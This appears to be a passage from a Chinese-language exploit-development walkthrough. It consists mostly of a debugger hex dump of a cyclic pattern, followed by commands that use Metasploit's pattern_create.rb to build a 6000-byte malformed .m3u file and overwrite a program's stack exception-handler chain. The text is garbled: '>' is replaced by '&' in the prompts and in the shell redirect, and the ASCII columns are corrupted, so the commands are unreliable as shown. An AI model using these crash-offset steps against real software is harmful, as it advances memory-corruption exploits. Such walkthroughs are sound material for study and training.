Bo8Bo9Bp0Bp1Bp2B
70 33 42 70 34 42 70 35-42 70 36 42 70 37 42 70
p3Bp4Bp5Bp6Bp7Bp
38 42 70 39 42 71 30 42-71 31 42 71 32 42 71 33
8Bp9Bq0Bq1Bq2Bq3
42 71 34 42 71 35 42 71-36 42 71 37 42 71 38 42
Bq4Bq5Bq6Bq7Bq8B
71 39 42 72 30 42 72 31-42 72 32 42 72 33 42 72
q9Br0Br1Br2Br3Br
34 42 72 35 42 72 36 42-72 37 42 72 38 42 72 39
4Br5Br6Br7Br8Br9
42 73 30 42 73 31 42 73-32 42 73 33 42 73 34 42
Bs0Bs1Bs2Bs3Bs4B
73 35 42 73 36 42 73 37-42 73 38 42 73 39 42 74
s5Bs6Bs7Bs8Bs9Bt
30 42 74 31 42 74 32 42-74 33 42 74 34 42 74 35
0Bt1Bt2Bt3Bt4Bt5
42 74 36 42 74 37 42 74-38 42 74 39 42 75 30 42
Bt6Bt7Bt8Bt9Bu0B
75 31 42 75 32 42 75 33-42 75 34 42 75 35 42 75
u1Bu2Bu3Bu4Bu5Bu
36 42 75 37 42 75 38 42-75 39 42 76 30 42 76 31
6Bu7Bu8Bu9Bv0Bv1
42 76 32 42 76 33 42 76-34 42 76 35 42 76 36 42
Bv2Bv3Bv4Bv5Bv6B
76 37 42 76 38 42 76 39-42 77 30 42 77 31 42 77
v7Bv8Bv9Bw0Bw1Bw
32 42 77 33 42 77 34 42-77 35 42 77 36 42 77 37
2Bw3Bw4Bw5Bw6Bw7
42 77 38 42 77 39 42 78-30 42 78 31 42 78 32 42
Bw8Bw9Bx0Bx1Bx2B
78 33 42 78 34 42 78 35-42 78 36 42 78 37 42 78
x3Bx4Bx5Bx6Bx7Bx
38 42 78 39 42 79 30 42-79 31 42 79 32 42 79 33
8Bx9By0By1By2By3
42 79 34 42 79 35 42 79-36 42 79 37 42 79 38 42
By4By5By6By7By8B
79 39 42 7a 30 42 7a 31-42 7a 32 42 7a 33 42 7a
y9Bz0Bz1Bz2Bz3Bz
34 42 7a 35 42 7a 36 42-7a 37 42 7a 38 42 7a 39
4Bz5Bz6Bz7Bz8Bz9
43 61 30 43 61 31 43 61-32 43 61 33 43 61 34 43
Ca0Ca1Ca2Ca3Ca4C
61 35 43 61 36 43 61 37-43 61 38 43 61 39 43 62
a5Ca6Ca7Ca8Ca9Cb
30 43 62 31 43 62 32 43-62 33 43 62 34 43 62 35
0Cb1Cb2Cb3Cb4Cb5
43 62 36 43 62 37 43 62-38 43 62 39 43 63 30 43
Cb6Cb7Cb8Cb9Cc0C
63 31 43 63 32 43 63 33-43 63 34 43 63 35 43 63
c1Cc2Cc3Cc4Cc5Cc
36 43 63 37 43 63 38 43-63 39 43 64 30 43 64 31
6Cc7Cc8Cc9Cd0Cd1
43 64 32 43 64 33 43 64-34 43 64 35 43 64 36 43
Cd2Cd3Cd4Cd5Cd6C
64 37 43 64 38 43 64 39-43 65 30 43 65 31 43 65
d7Cd8Cd9Ce0Ce1Ce
32 43 65 33 43 65 34 43-65 35 43 65 36 43 65 37
2Ce3Ce4Ce5Ce6Ce7
43 65 38 43 65 39 43 66-30 43 66 31 43 66 32 43
Ce8Ce9Cf0Cf1Cf2C
66 33 43 66 34 43 66 35-43 66 36 43 66 37 43 66
f3Cf4Cf5Cf6Cf7Cf
38 43 66 39 43 67 30 43-67 31 43 67 32 43 67 33
8Cf9Cg0Cg1Cg2Cg3
43 67 34 43 67 35 43 67-36 43 67 37 43 67 38 43
Cg4Cg5Cg6Cg7Cg8C
67 39 43 68 30 43 68 31-43 68 32 43 68 33 43 68
g9Ch0Ch1Ch2Ch3Ch
34 43 68 35 43 68 36 43-68 37 43 68 38 43 68 39
4Ch5Ch6Ch7Ch8Ch9
43 69 30 43 69 31 43 69-32 43 69 33 43 69 34 43
Ci0Ci1Ci2Ci3Ci4C
69 35 43 69 36 43 69 37-43 69 38 43 69 39 43 6a
i5Ci6Ci7Ci8Ci9Cj
30 43 6a 31 43 6a 32 43-6a 33 43 6a 34 43 6a 35
0Cj1Cj2Cj3Cj4Cj5
43 6a 36 43 6a 37 43 6a-38 43 6a 39 43 6b 30 43
Cj6Cj7Cj8Cj9Ck0C
6b 31 43 6b 32 43 6b 33-43 6b 34 43 6b 35 43 6b
k1Ck2Ck3Ck4Ck5Ck
36 43 6b 37 43 6b 38 43-6b 39 43 6c 30 43 6c 31
6Ck7Ck8Ck9Cl0Cl1
43 6c 32 43 6c 33 43 6c-34 43 6c 35 43 6c 36 43
Cl2Cl3Cl4Cl5Cl6C
6c 37 43 6c 38 43 6c 39-43 6d 30 43 6d 31 43 6d
l7Cl8Cl9Cm0Cm1Cm
32 43 6d 33 43 6d 34 43-6d 35 43 6d 36 43 6d 37
2Cm3Cm4Cm5Cm6Cm7
43 6d 38 43 6d 39 43 6e-30 43 6e 31 43 6e 32 43
Cm8Cm9Cn0Cn1Cn2C
6e 33 43 6e 34 43 6e 35-43 6e 36 43 6e 37 43 6e
n3Cn4Cn5Cn6Cn7Cn
38 43 6e 39 43 6f 30 43-6f 31 43 6f 32 43 6f 33
8Cn9Co0Co1Co2Co3
43 6f 34 43 6f 35 43 6f-36 43 6f 37 43 6f 38 43
Co4Co5Co6Co7Co8C
6f 39 43 70 30 43 70 31-43 70 32 43 70 33 43 70
o9Cp0Cp1Cp2Cp3Cp
34 43 70 35 43 70 36 43-70 37 43 70 38 43 70 39
4Cp5Cp6Cp7Cp8Cp9
43 71 30 43 71 31 43 71-32 43 71 33 43 71 34 43
Cq0Cq1Cq2Cq3Cq4C
71 35 43 71 36 43 71 37-43 71 38 43 71 39 43 72
q5Cq6Cq7Cq8Cq9Cr
30 43 72 31 43 72 32 43-72 33 43 72 34 43 72 35
0Cr1Cr2Cr3Cr4Cr5
43 72 36 43 72 37 43 72-38 43 72 39 43 73 30 43
Cr6Cr7Cr8Cr9Cs0C
73 31 43 73 32 43 73 33-43 73 34 43 73 35 43 73
s1Cs2Cs3Cs4Cs5Cs
36 43 73 37 43 73 38 43-73 39 43 74 30 43 74 31
6Cs7Cs8Cs9Ct0Ct1
43 74 32 43 74 33 43 74-34 43 74 35 43 74 36 43
Ct2Ct3Ct4Ct5Ct6C
74 37 43 74 38 43 74 39-43 75 30 43 75 31 43 75
t7Ct8Ct9Cu0Cu1Cu
32 43 75 33 43 75 34 43-75 35 43 75 36 43 75 37
2Cu3Cu4Cu5Cu6Cu7
43 75 38 43 75 39 43 76-30 43 76 31 43 76 32 43
Cu8Cu9Cv0Cv1Cv2C
76 33 43 76 34 43 76 35-43 76 36 43 76 37 43 76
v3Cv4Cv5Cv6Cv7Cv
38 43 76 39 43 77 30 43-77 31 43 77 32 43 77 33
8Cv9Cw0Cw1Cw2Cw3
43 77 34 43 77 35 43 77-36 43 77 37 43 77 38 43
Cw4Cw5Cw6Cw7Cw8C
77 39 43 78 30 43 78 31-43 78 32 43 78 33 43 78
w9Cx0Cx1Cx2Cx3Cx
34 43 78 35 43 78 36 43-78 37 43 78 38 43 78 39
4Cx5Cx6Cx7Cx8Cx9
43 79 30 43 79 31 43 79-32 43 79 33 43 79 34 43
Cy0Cy1Cy2Cy3Cy4C
79 35 43 79 36 43 79 37-43 79 38 43 79 39 43 7a
y5Cy6Cy7Cy8Cy9Cz
30 43 7a 31 43 7a 32 43-7a 33 43 7a 34 43 7a 35
0Cz1Cz2Cz3Cz4Cz5
43 7a 36 43 7a 37 43 7a-38 43 7a 39 44 61 30 44
Cz6Cz7Cz8Cz9Da0D
61 31 44 61 32 44 61 33-44 61 34 44 61 35 44 61
a1Da2Da3Da4Da5Da
36 44 61 37 44 61 38 44-61 39 44 62 30 44 62 31
6Da7Da8Da9Db0Db1
44 62 32 44 62 33 44 62-34 44 62 35 44 62 36 44
Db2Db3Db4Db5Db6D
62 37 44 62 38 44 62 39-44 63 30 44 63 31 44 63
b7Db8Db9Dc0Dc1Dc
32 44 63 33 44 63 34 44-63 35 44 63 36 44 63 37
2Dc3Dc4Dc5Dc6Dc7
44 63 38 44 63 39 44 64-30 44 64 31 44 64 32 44
Dc8Dc9Dd0Dd1Dd2D
64 33 44 64 34 44 64 35-44 64 36 44 64 37 44 64
d3Dd4Dd5Dd6Dd7Dd
38 44 64 39 44 65 30 44-65 31 44 65 32 44 65 33
8Dd9De0De1De2De3
44 65 34 44 65 35 44 65-36 44 65 37 44 65 38 44
De4De5De6De7De8D
65 39 44 66 30 44 66 31-44 66 32 44 66 33 44 66
e9Df0Df1Df2Df3Df
34 44 66 35 44 66 36 44-66 37 44 66 38 44 66 39
4Df5Df6Df7Df8Df9
44 67 30 44 67 31 44 67-32 44 67 33 44 67 34 44
Dg0Dg1Dg2Dg3Dg4D
67 35 44 67 36 44 67 37-44 67 38 44 67 39 44 68
g5Dg6Dg7Dg8Dg9Dh
30 44 68 31 44 68 32 44-68 33 44 68 34 44 68 35
0Dh1Dh2Dh3Dh4Dh5
44 68 36 44 68 37 44 68-38 44 68 39 44 69 30 44
Dh6Dh7Dh8Dh9Di0D
69 31 44 69 32 44 69 33-44 69 34 44 69 35 44 69
i1Di2Di3Di4Di5Di
36 44 69 37 44 69 38 44-69 39 44 6a 30 44 6a 31
6Di7Di8Di9Dj0Dj1
44 6a 32 44 6a 33 44 6a-34 44 6a 35 44 6a 36 44
Dj2Dj3Dj4Dj5Dj6D
6a 37 44 6a 38 44 6a 39-44 6b 30 44 6b 31 44 6b
j7Dj8Dj9Dk0Dk1Dk
32 44 6b 33 44 6b 34 44-6b 35 44 6b 36 44 6b 37
2Dk3Dk4Dk5Dk6Dk7
44 6b 38 44 6b 39 44 6c-30 44 6c 31 44 6c 32 44
Dk8Dk9Dl0Dl1Dl2D
6c 33 44 6c 34 44 6c 35-44 6c 36 44 6c 37 44 6c
l3Dl4Dl5Dl6Dl7Dl
38 44 6c 39 44 6d 30 44-6d 31 44 6d 32 44 6d 33
8Dl9Dm0Dm1Dm2Dm3
44 6d 34 44 6d 35 44 6d-36 44 6d 37 44 6d 38 44
Dm4Dm5Dm6Dm7Dm8D
6d 39 44 6e 30 44 6e 31-44 6e 32 44 6e 33 44 6e
m9Dn0Dn1Dn2Dn3Dn
34 44 6e 35 44 6e 36 44-6e 37 44 6e 38 44 6e 39
4Dn5Dn6Dn7Dn8Dn9
44 6f 30 44 6f 31 44 6f-32 44 6f 33 44 6f 34 44
Do0Do1Do2Do3Do4D
6f 35 44 6f 36 44 6f 37-44 6f 38 44 6f 39 44 70
o5Do6Do7Do8Do9Dp
30 44 70 31 44 70 32 44-70 33 44 70 34 44 70 35
0Dp1Dp2Dp3Dp4Dp5
44 70 36 44 70 37 44 70-38 44 70 39 44 71 30 44
Dp6Dp7Dp8Dp9Dq0D
71 31 44 71 32 44 71 33-44 71 34 44 71 35 44 71
q1Dq2Dq3Dq4Dq5Dq
36 44 71 37 44 71 38 44-71 39 44 72 30 44 72 31
6Dq7Dq8Dq9Dr0Dr1
44 72 32 44 72 33 44 72-34 44 72 35 44 72 36 44
Dr2Dr3Dr4Dr5Dr6D
72 37 44 72 38 44 72 39-44 73 30 44 73 31 44 73
r7Dr8Dr9Ds0Ds1Ds
32 44 73 33 44 73 34 44-73 35 44 73 36 44 73 37
2Ds3Ds4Ds5Ds6Ds7
44 73 38 44 73 39 44 74-30 44 74 31 44 74 32 44
Ds8Ds9Dt0Dt1Dt2D
74 33 44 74 34 44 74 35-44 74 36 44 74 37 44 74
t3Dt4Dt5Dt6Dt7Dt
38 44 74 39 44 75 30 44-75 31 44 75 32 44 75 33
8Dt9Du0Du1Du2Du3
44 75 34 44 75 35 44 75-36 44 75 37 44 75 38 44
Du4Du5Du6Du7Du8D
75 39 44 76 30 44 76 31-44 76 32 44 76 33 44 76
u9Dv0Dv1Dv2Dv3Dv
34 44 76 35 44 76 36 44-76 37 44 76 38 44 76 39
4Dv5Dv6Dv7Dv8Dv9
44 77 30 44 77 31 44 77-32 44 77 33 44 77 34 44
Dw0Dw1Dw2Dw3Dw4D
77 35 44 77 36 44 77 37-44 77 38 44 77 39 44 78
w5Dw6Dw7Dw8Dw9Dx
30 44 78 31 44 78 32 44-78 33 44 78 34 44 78 35
0Dx1Dx2Dx3Dx4Dx5
44 78 36 44 78 37 44 78-38 44 78 39 44 79 30 44
Dx6Dx7Dx8Dx9Dy0D
79 31 44 79 32 44 79 33-44 79 34 44 79 35 44 79
y1Dy2Dy3Dy4Dy5Dy
36 44 79 37 44 79 38 44-79 39 44 7a 30 44 7a 31
6Dy7Dy8Dy9Dz0Dz1
44 7a 32 44 7a 33 44 7a-34 44 7a 35 44 7a 36 44
Dz2Dz3Dz4Dz5Dz6D
7a 37 44 7a 38 44 7a 39-45 61 30 45 61 31 45 61
z7Dz8Dz9Ea0Ea1Ea
32 45 61 33 45 61 34 45-61 35 45 61 36 45 61 37
2Ea3Ea4Ea5Ea6Ea7
45 61 38 45 61 39 45 62-30 45 62 31 45 62 32 45
Ea8Ea9Eb0Eb1Eb2E
62 33 45 62 34 45 62 35-45 62 36 45 62 37 45 62
b3Eb4Eb5Eb6Eb7Eb
38 45 62 39 45 63 30 45-63 31 45 63 32 45 63 33
8Eb9Ec0Ec1Ec2Ec3
45 63 34 45 63 35 45 63-36 45 63 37 45 63 38 45
Ec4Ec5Ec6Ec7Ec8E
63 39 45 64 30 45 64 31-45 64 32 45 64 33 45 64
c9Ed0Ed1Ed2Ed3Ed
34 45 64 35 45 64 36 45-64 37 45 64 38 45 64 39
4Ed5Ed6Ed7Ed8Ed9
45 65 30 45 65 31 45 65-32 45 65 33 45 65 34 45
Ee0Ee1Ee2Ee3Ee4E
65 35 45 65 36 45 65 37-45 65 38 45 65 39 45 66
e5Ee6Ee7Ee8Ee9Ef
30 45 66 31 45 66 32 45-66 33 45 66 34 45 66 35
0Ef1Ef2Ef3Ef4Ef5
45 66 36 45 66 37 45 66-38 45 66 39 45 67 30 45
Ef6Ef7Ef8Ef9Eg0E
67 31 45 67 32 45 67 33-45 67 34 45 67 35 45 67
g1Eg2Eg3Eg4Eg5Eg
36 45 67 37 45 67 38 45-67 39 45 68 30 45 68 31
6Eg7Eg8Eg9Eh0Eh1
45 68 32 45 68 33 45 68-34 45 68 35 45 68 36 45
Eh2Eh3Eh4Eh5Eh6E
68 37 45 68 38 45 68 39-45 69 30 45 69 31 45 69
h7Eh8Eh9Ei0Ei1Ei
32 45 69 33 45 69 34 45-69 35 45 69 36 45 69 37
2Ei3Ei4Ei5Ei6Ei7
45 69 38 45 69 39 45 6a-30 45 6a 31 45 6a 32 45
Ei8Ei9Ej0Ej1Ej2E
6a 33 45 6a 34 45 6a 35-45 6a 36 45 6a 37 45 6a
j3Ej4Ej5Ej6Ej7Ej
38 45 6a 39 45 6b 30 45-6b 31 45 6b 32 45 6b 33
8Ej9Ek0Ek1Ek2Ek3
45 6b 34 45 6b 35 45 6b-36 45 6b 37 45 6b 38 45
Ek4Ek5Ek6Ek7Ek8E
6b 39 45 6c 30 45 6c 31-45 6c 32 45 6c 33 45 6c
k9El0El1El2El3El
34 45 6c 35 45 6c 36 45-6c 37 45 6c 38 45 6c 39
4El5El6El7El8El9
45 6d 30 45 6d 31 45 6d-32 45 6d 33 45 6d 34 45
Em0Em1Em2Em3Em4E
6d 35 45 6d 36 45 6d 37-45 6d 38 45 6d 39 45 6e
m5Em6Em7Em8Em9En
30 45 6e 31 45 6e 32 45-6e 33 45 6e 34 45 6e 35
0En1En2En3En4En5
45 6e 36 45 6e 37 45 6e-38 45 6e 39 45 6f 30 45
En6En7En8En9Eo0E
6f 31 45 6f 32 45 6f 33-45 6f 34 45 6f 35 45 6f
o1Eo2Eo3Eo4Eo5Eo
36 45 6f 37 45 6f 38 45-6f 39 45 70 30 45 70 31
6Eo7Eo8Eo9Ep0Ep1
45 70 32 45 70 33 45 70-34 45 70 35 45 70 36 45
Ep2Ep3Ep4Ep5Ep6E
70 37 45 70 38 45 70 39-45 71 30 45 71 31 45 71
p7Ep8Ep9Eq0Eq1Eq
32 45 71 33 45 71 34 45-71 35 45 71 36 45 71 37
2Eq3Eq4Eq5Eq6Eq7
45 71 38 45 71 39 45 72-30 45 72 31 45 72 32 45
Eq8Eq9Er0Er1Er2E
72 33 45 72 34 45 72 35-45 72 36 45 72 37 45 72
r3Er4Er5Er6Er7Er
38 45 72 39 45 73 30 45-73 31 45 73 32 45 73 33
8Er9Es0Es1Es2Es3
45 73 34 45 73 35 45 73-36 45 73 37 45 73 38 45
Es4Es5Es6Es7Es8E
73 39 45 74 30 45 74 31-45 74 32 45 74 33 45 74
s9Et0Et1Et2Et3Et
34 45 74 35 45 74 36 45-74 37 45 74 38 45 74 39
4Et5Et6Et7Et8Et9
45 75 30 45 75 31 45 75-32 45 75 33 45 75 34 45
Eu0Eu1Eu2Eu3Eu4E
75 35 45 75 36 45 75 37-45 75 38 45 75 39 45 76
u5Eu6Eu7Eu8Eu9Ev
30 45 76 31 45 76 32 45-76 33 45 76 34 45 76 35
0Ev1Ev2Ev3Ev4Ev5
45 76 36 45 76 37 45 76-38 45 76 39 45 77 30 45
Ev6Ev7Ev8Ev9Ew0E
77 31 45 77 32 45 77 33-45 77 34 45 77 35 45 77
w1Ew2Ew3Ew4Ew5Ew
36 45 77 37 45 77 38 45-77 39 45 78 30 45 78 31
6Ew7Ew8Ew9Ex0Ex1
45 78 32 45 78 33 45 78-34 45 78 35 45 78 36 45
Ex2Ex3Ex4Ex5Ex6E
78 37 45 78 38 45 78 39-45 79 30 45 79 31 45 79
x7Ex8Ex9Ey0Ey1Ey
32 45 79 33 45 79 34 45-79 35 45 79 36 45 79 37
2Ey3Ey4Ey5Ey6Ey7
45 79 38 45 79 39 45 7a-30 45 7a 31 45 7a 32 45
Ey8Ey9Ez0Ez1Ez2E
7a 33 45 7a 34 45 7a 35-45 7a 36 45 7a 37 45 7a
z3Ez4Ez5Ez6Ez7Ez
38 45 7a 39 46 61 30 46-61 31 46 61 32 46 61 33
8Ez9Fa0Fa1Fa2Fa3
46 61 34 46 61 35 46 61-36 46 61 37 46 61 38 46
Fa4Fa5Fa6Fa7Fa8F
61 39 46 62 30 46 62 31-46 62 32 46 62 33 46 62
a9Fb0Fb1Fb2Fb3Fb
34 46 62 35 46 62 36 46-62 37 46 62 38 46 62 39
4Fb5Fb6Fb7Fb8Fb9
46 63 30 46 63 31 46 63-32 46 63 33 46 63 34 46
Fc0Fc1Fc2Fc3Fc4F
63 35 46 63 36 46 63 37-46 63 38 46 63 39 46 64
c5Fc6Fc7Fc8Fc9Fd
30 46 64 31 46 64 32 46-64 33 46 64 34 46 64 35
0Fd1Fd2Fd3Fd4Fd5
46 64 36 46 64 37 46 64-38 46 64 39 46 65 30 46
Fd6Fd7Fd8Fd9Fe0F
65 31 46 65 32 46 65 33-46 65 34 46 65 35 46 65
e1Fe2Fe3Fe4Fe5Fe
36 46 65 37 46 65 38 46-65 39 46 66 30 46 66 31
6Fe7Fe8Fe9Ff0Ff1
46 66 32 46 66 33 46 66-34 46 66 35 46 66 36 46
Ff2Ff3Ff4Ff5Ff6F
66 37 46 66 38 46 66 39-46 67 30 46 67 31 46 67
f7Ff8Ff9Fg0Fg1Fg
32 46 67 33 46 67 34 46-67 35 46 67 36 46 67 37
2Fg3Fg4Fg5Fg6Fg7
46 67 38 46 67 39 46 68-30 46 68 31 46 68 32 46
Fg8Fg9Fh0Fh1Fh2F
68 33 46 68 34 46 68 35-46 68 36 46 68 37 46 68
h3Fh4Fh5Fh6Fh7Fh
38 46 68 39 46 69 30 46-69 31 46 69 32 46 69 33
8Fh9Fi0Fi1Fi2Fi3
46 69 34 46 69 35 46 69-36 46 69 37 46 69 38 46
Fi4Fi5Fi6Fi7Fi8F
69 39 46 6a 30 46 6a 31-46 6a 32 46 6a 33 46 6a
i9Fj0Fj1Fj2Fj3Fj
34 46 6a 35 46 6a 36 46-6a 37 46 6a 38 46 6a 39
4Fj5Fj6Fj7Fj8Fj9
46 6b 30 46 6b 31 46 6b-32 46 6b 33 46 6b 34 46
Fk0Fk1Fk2Fk3Fk4F
6b 35 46 6b 36 46 6b 37-46 6b 38 46 6b 39 46 6c
k5Fk6Fk7Fk8Fk9Fl
30 46 6c 31 46 6c 32 46-6c 33 46 6c 34 46 6c 35
0Fl1Fl2Fl3Fl4Fl5
46 6c 36 46 6c 37 46 6c-38 46 6c 39 46 6d 30 46
Fl6Fl7Fl8Fl9Fm0F
6d 31 46 6d 32 46 6d 33-46 6d 34 46 6d 35 46 6d
m1Fm2Fm3Fm4Fm5Fm
36 46 6d 37 46 6d 38 46-6d 39 46 6e 30 46 6e 31
6Fm7Fm8Fm9Fn0Fn1
46 6e 32 46 6e 33 46 6e-34 46 6e 35 46 6e 36 46
Fn2Fn3Fn4Fn5Fn6F
6e 37 46 6e 38 46 6e 39-46 6f 30 46 6f 31 46 6f
n7Fn8Fn9Fo0Fo1Fo
32 46 6f 33 46 6f 34 46-6f 35 46 6f 36 46 6f 37
2Fo3Fo4Fo5Fo6Fo7
46 6f 38 46 6f 39 46 70-30 46 70 31 46 70 32 46
Fo8Fo9Fp0Fp1Fp2F
70 33 46 70 34 46 70 35-46 70 36 46 70 37 46 70
p3Fp4Fp5Fp6Fp7Fp
38 46 70 39 46 71 30 46-71 31 46 71 32 46 71 33
8Fp9Fq0Fq1Fq2Fq3
46 71 34 46 71 35 46 71-36 46 71 37 46 71 38 46
Fq4Fq5Fq6Fq7Fq8F
71 39 46 72 30 46 72 31-46 72 32 46 72 33 46 72
q9Fr0Fr1Fr2Fr3Fr
34 46 72 35 46 72 36 46-72 37 46 72 38 46 72 39
4Fr5Fr6Fr7Fr8Fr9
46 73 30 46 73 31 46 73-32 46 73 33 46 73 34 46
Fs0Fs1Fs2Fs3Fs4F
73 35 46 73 36 46 73 37-46 73 38 46 73 39 46 74
s5Fs6Fs7Fs8Fs9Ft
30 46 74 31 46 74 32 46-74 33 46 74 34 46 74 35
0Ft1Ft2Ft3Ft4Ft5
46 74 36 46 74 37 46 74-38 46 74 39 46 75 30 46
Ft6Ft7Ft8Ft9Fu0F
75 31 46 75 32 46 75 33-46 75 34 46 75 35 46 75
u1Fu2Fu3Fu4Fu5Fu
36 46 75 37 46 75 38 46-75 39 46 76 30 46 76 31
6Fu7Fu8Fu9Fv0Fv1
46 76 32 46 76 33 46 76-34 46 76 35 46 76 36 46
Fv2Fv3Fv4Fv5Fv6F
76 37 46 76 38 46 76 39-46 77 30 46 77 31 46 77
v7Fv8Fv9Fw0Fw1Fw
32 46 77 33 46 77 34 46-77 35 46 77 36 46 77 37
2Fw3Fw4Fw5Fw6Fw7
46 77 38 46 77 39 46 78-30 46 78 31 46 78 32 46
Fw8Fw9Fx0Fx1Fx2F
78 33 46 78 34 46 78 35-46 78 36 46 78 37 46 78
x3Fx4Fx5Fx6Fx7Fx
38 46 78 39 46 79 30 46-79 31 46 79 32 46 79 33
8Fx9Fy0Fy1Fy2Fy3
46 79 34 46 79 35 46 79-36 46 79 37 46 79 38 46
Fy4Fy5Fy6Fy7Fy8F
79 39 46 7a 30 46 7a 31-46 7a 32 46 7a 33 46 7a
y9Fz0Fz1Fz2Fz3Fz
34 46 7a 35 46 7a 36 46-7a 37 46 7a 38 46 7a 39
4Fz5Fz6Fz7Fz8Fz9
47 61 30 47 61 31 47 61-32 47 61 33 47 61 34 47
Ga0Ga1Ga2Ga3Ga4G
61 35 47 61 36 47 61 37-47 61 38 47 61 39 47 62
a5Ga6Ga7Ga8Ga9Gb
30 47 62 31 47 62 32 47-62 33 47 62 34 47 62 35
0Gb1Gb2Gb3Gb4Gb5
47 62 36 47 62 37 47 62-38 47 62 39 47 63 30 47
Gb6Gb7Gb8Gb9Gc0G
63 31 47 63 32 47 63 33-47 63 34 47 63 35 47 63
c1Gc2Gc3Gc4Gc5Gc
36 47 63 37 47 63 38 47-63 39 47 64 30 47 64 31
6Gc7Gc8Gc9Gd0Gd1
47 64 32 47 64 33 47 64-34 47 64 35 47 64 36 47
Gd2Gd3Gd4Gd5Gd6G
64 37 47 64 38 47 64 39-47 65 30 47 65 31 47 65
d7Gd8Gd9Ge0Ge1Ge
32 47 65 33 47 65 34 47-65 35 47 65 36 47 65 37
2Ge3Ge4Ge5Ge6Ge7
47 65 38 47 65 39 47 66-30 47 66 31 47 66 32 47
Ge8Ge9Gf0Gf1Gf2G
66 33 47 66 34 47 66 35-47 66 36 47 66 37 47 66
f3Gf4Gf5Gf6Gf7Gf
38 47 66 39 47 67 30 47-67 31 47 67 32 47 67 33
8Gf9Gg0Gg1Gg2Gg3
47 67 34 47 67 35 47 67-36 47 67 37 47 67 38 47
Gg4Gg5Gg6Gg7Gg8G
67 39 47 68 30 47 68 31-47 68 32 47 68 33 47 68
g9Gh0Gh1Gh2Gh3Gh
34 47 68 35 47 68 36 47-68 37 47 68 38 47 68 39
4Gh5Gh6Gh7Gh8Gh9
47 69 30 47 69 31 47 69-32 47 69 33 47 69 34 47
Gi0Gi1Gi2Gi3Gi4G
69 35 47 69 36 47 69 37-47 69 38 47 69 39 47 6a
i5Gi6Gi7Gi8Gi9Gj
30 47 6a 31 47 6a 32 47-6a 33 47 6a 34 47 6a 35
0Gj1Gj2Gj3Gj4Gj5
47 6a 36 47 6a 37 47 6a-38 47 6a 39 47 6b 30 47
Gj6Gj7Gj8Gj9Gk0G
6b 31 47 6b 32 47 6b 33-47 6b 34 47 6b 35 47 6b
k1Gk2Gk3Gk4Gk5Gk
00 61 35 47 61 36 47 61-37 47 61 38 47 61 39 47
.a5Ga6Ga7Ga8Ga9G
62 30 47 62 31 47 62 32-47 62 33 47 62 34 47 62
b0Gb1Gb2Gb3Gb4Gb
35 47 62 36 47 62 37 47-62 38 47 62 39 47 63 30
5Gb6Gb7Gb8Gb9Gc0
47 63 31 47 63 32 47 63-33 47 63 34 47 63 35 47
Gc1Gc2Gc3Gc4Gc5G
63 36 47 63 37 47 63 38-47 63 39 47 64 30 47 64
c6Gc7Gc8Gc9Gd0Gd
31 47 64 32 47 64 33 47-64 34 47 64 35 47 64 36
1Gd2Gd3Gd4Gd5Gd6
47 64 37 47 64 38 47 64-39 47 65 30 47 65 31 47
Gd7Gd8Gd9Ge0Ge1G
65 32 47 65 33 47 65 34-47 65 35 47 65 36 47 65
e2Ge3Ge4Ge5Ge6Ge
37 47 65 38 47 65 39 47-66 30 47 66 31 47 66 32
7Ge8Ge9Gf0Gf1Gf2
47 66 33 47 66 34 47 66-35 47 66 36 47 66 37 47
Gf3Gf4Gf5Gf6Gf7G
66 38 47 66 39 47 67 30-47 67 31 47 67 32 47 67
f8Gf9Gg0Gg1Gg2Gg
33 47 67 34 47 67 35 47-67 36 47 67 37 47 67 38
3Gg4Gg5Gg6Gg7Gg8
47 67 39 47 68 30 47 68-31 47 68 32 47 68 33 47
Gg9Gh0Gh1Gh2Gh3G
68 34 47 68 35 47 68 36-47 68 37 47 68 38 47 68
h4Gh5Gh6Gh7Gh8Gh
39 47 69 30 47 69 31 47-69 32 47 69 33 47 69 34
9Gi0Gi1Gi2Gi3Gi4
47 69 35 47 69 36 47 69-37 47 69 38 47 69 39 47
Gi5Gi6Gi7Gi8Gi9G
6a 30 47 6a 31 47 6a 32-47 6a 33 47 6a 34 47 6a
j0Gj1Gj2Gj3Gj4Gj
35 47 6a 36 47 6a 37 47-6a 38 47 6a 39 47 6b 30
5Gj6Gj7Gj8Gj9Gk0
47 6b 31 47 6b 32 47 6b-33 47 6b 34 47 6b 35 47
Gk1Gk2Gk3Gk4Gk5G
6b 00 a7 00 94 ff 22 00-ff ff ff ff 90 ff 22 00
k&..&&&.&.
00 00 00 00 00 00 00 00-40 11 40 00 00 00 00 00
&&..@.@&..
20 b0 62 81 00 00 00 00-60 2a 3e 00 00 00 00 00
.b&..`*&&..
00 e0 fd 7f c0 ff 22 00-58 11 40 00 02 00 00 00
&&&.X.@&..
00 00 00 00 ba dc 92 7c-e4 6f 81 7c fe ff ff ff
&&.|.o.|&.
09 00 00 00 f0 ff 22 00-e7 6f 81 7c 00 00 00 00
&&&..o.|&.
f9 b3 d1 77 00 e0 fd 7f-05 00 00 c0 c8 ff 22 00
d0 e2 22 00 ff ff ff ff-f0 9a 83 7c f0 6f 81 7c
..&&&..|.o.|
00 00 00 00 00 00 00 00-00 00 00 00 40 11 40 00
00 00 00 00 41 63 74 78-20 00 00 00 01 00 00 00
&.Actx &&.
b8 24 00 00 c4 00 00 00-00 00 00 00 20 00 00 00
00 00 00 00 14 00 00 00-01 00 00 00 06 00 00 00
可以看到超长字符串，还差约150字节就能覆盖到栈中的异常处理结构，重新生成一个更大的畸形文件
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 6000 & ~/Desktop/6k.m3u
重新运行程序
0:000& !exchain
0022ffe0: 6f47366f
Invalid exception stack at 47356f47
0:000& d fs:[0]
*** ERROR: Module load completed but symbols could not be loaded for image
e0 ff 22 00 00 00 23 00-00 a0 22 00 00 00 00 00 ..&&#&&&..
003b: 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 &&&&&.
003b:c 07 00 00 60 0a 00 00-00 00 00 00 88 2c 25 00 \&`&&..,%.
003b: 60 fd 7f ce 00 00 00-00 00 00 00 00 00 00 00 .`&&&&..
003b: 64 55 e2 00 00 00 00-00 00 00 00 00 00 00 00 .dU&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
0:000& d 0022ffe0
47 6f 35 47 6f 36 47 6f-37 47 6f 38 47 6f 39 47
Go5Go6Go7Go8Go9G
